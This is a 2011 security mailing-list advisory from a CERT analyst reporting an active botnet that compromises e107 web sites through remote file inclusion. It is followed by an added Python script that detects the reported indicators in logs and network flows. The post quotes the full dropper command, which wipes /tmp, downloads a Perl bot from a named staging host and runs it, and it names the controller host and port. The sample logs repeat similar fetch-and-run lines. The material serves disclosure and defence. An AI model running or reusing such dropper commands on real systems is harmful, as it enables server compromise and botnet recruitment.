[nsp-sec] active casper RFI botnet c&c: 194.44.194.131
Marius Urkis
marius at litnet.lt
Mon Jan 3 10:40:38 EST 2011
Hello,
There is an active botnet dedicated mainly to compromising vulnerable
e107-based web sites. Bots use search engines to find vulnerable sites and
the exploit results in executing the following code to run a bot:
"cd /var/tmp;cd /tmp;rm -fr *;lwp-download http://linuxcostablanca.com
/date/sbn.txt -O sbn.txt;curl -O http://linuxcostablanca.com
/date/sbn.txt -O sbn.txt;http://linuxcostablanca.com/date/sbn.txt -O
sbn.txt;perl sbn.txt"
Botnet controller sits at oxyde.ath.cx, 194.44.194.131, TCP/6667
3255 | 194.44.194.131 | UARNET-AS Ukrainian Academic and Research
Network
Cheers
--
Marius
=============================
Marius Urkis
LITNET CERT
http://cert.litnet.lt
Tel: +370 37 300645
GSM: +370 687 79059
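
A defender-side check built from the indicators in the message above, as an added example that is not part of the original post. It flags logged request or command strings that match the dropper (staging host, payload name, or the fetch-then-run-perl-in-/tmp behaviour) and outbound flows to the reported controller on TCP/6667. The log lines, request path, parameter name, and client addresses are constructed samples.

```python
import re
from urllib.parse import unquote_plus

# Indicators copied from the message above.
STAGING_HOST = "linuxcostablanca.com"
PAYLOAD_NAME = "sbn.txt"
C2_HOSTS = {"oxyde.ath.cx", "194.44.194.131"}
C2_PORT = 6667

# Behaviour of the dropper: work in a temp dir, fetch a file, run it with perl.
TMP_DIR = re.compile(r"\bcd\s+(?:/var)?/tmp\b")
FETCH = re.compile(r"\b(?:lwp-download|curl|wget)\b")
RUN_PERL = re.compile(r"\bperl\s+\S+")

def score_command(text):
    """Return the reasons a logged request or command string matches the dropper."""
    # Decode twice so single and double URL-encoded payloads are both caught.
    decoded = unquote_plus(unquote_plus(text)).lower()
    reasons = []
    if STAGING_HOST in decoded:
        reasons.append("staging-host")
    if PAYLOAD_NAME in decoded:
        reasons.append("payload-name")
    if TMP_DIR.search(decoded) and FETCH.search(decoded) and RUN_PERL.search(decoded):
        reasons.append("fetch-and-run-perl-in-tmp")
    return reasons

def is_c2_connection(dst, port):
    """True for an outbound flow to the reported controller on TCP/6667."""
    return dst.lower() in C2_HOSTS and int(port) == C2_PORT

# Constructed sample data (request path, parameter and client IPs are made up).
SAMPLE_LOGS = [
    '198.51.100.7 "GET /index.php?x=cd%20/tmp%3Blwp-download%20http%3A//'
    'linuxcostablanca.com/date/sbn.txt%3Bperl%20sbn.txt HTTP/1.1" 200',
    '198.51.100.9 "GET /news.php?item=12 HTTP/1.1" 200',
    'sh -c cd /var/tmp;cd /tmp;curl -O http://example.invalid/a.txt;perl a.txt',
]
SAMPLE_FLOWS = [("10.0.0.5", "194.44.194.131", 6667), ("10.0.0.5", "192.0.2.10", 443)]

def scan(logs=SAMPLE_LOGS, flows=SAMPLE_FLOWS):
    """Return (matching log lines with reasons, internal hosts talking to the C&C)."""
    hits = [(line, r) for line in logs if (r := score_command(line))]
    infected = [src for src, dst, port in flows if is_c2_connection(dst, port)]
    return hits, infected

if __name__ == "__main__":
    hits, infected = scan()
    for line, reasons in hits:
        print(reasons, "<-", line[:60])
    print("hosts talking to the controller:", infected)
```

The third sample line matches on behaviour alone, which keeps the check useful if the staging host or file name changes.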